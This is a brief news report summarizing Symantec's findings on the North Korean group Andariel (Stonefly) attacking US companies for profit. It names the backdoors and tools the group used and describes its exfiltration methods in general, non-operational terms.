Symantec revealed that the North Korean group known as Andariel, also referred to as StoneFly, APT45, Silent Chollima, and ONYX SLET, continues to target organizations in the United States for financial gain, despite facing charges and declared rewards.
In August, Symantec reported that three American companies were infiltrated by the group a month after legal action was taken. Although the hackers were unable to deploy malicious programs on the victims’ networks, their motives were financially driven. All targeted companies were private entities involved in commercial operations without apparent intelligence value.
Stonefly utilized its custom malicious tool, Backdoor.preft (also known as DTRACK and VALEFOR), during the attacks. This tool enabled the hackers to download files, execute commands, and install plugins. Symantec also identified compromise indicators, such as a fake Tableau certificate, as reported by Microsoft.
Aside from Backdoor.preft, Stonefly employed other tools to maintain access to compromised systems. For instance, they used the Nukebot backdoor, which not only had functionalities similar to Backdoor.preft but could also capture screenshots. The leakage of the source code for Nukebot allowed the group to integrate it into their operations. Additionally, the attackers leveraged scripts for password harvesting and Mimikatz for collecting credential data.
Two distinct data exfiltration methods were identified during the attacks:
- The first method involved stealing data from the exchange buffer, recording program launches and keystrokes, encrypting the collected data, and archiving it.
- The second method also focused on data theft from the exchange buffer, storing the information in a randomly named Dat file within a temporary directory.
Furthermore, Stonefly employed tunnels, SSH clients (such as Putty and PLINK), cloud storage utilities (Megatools), and data visualization tools (SNAP2HTML) in their operations.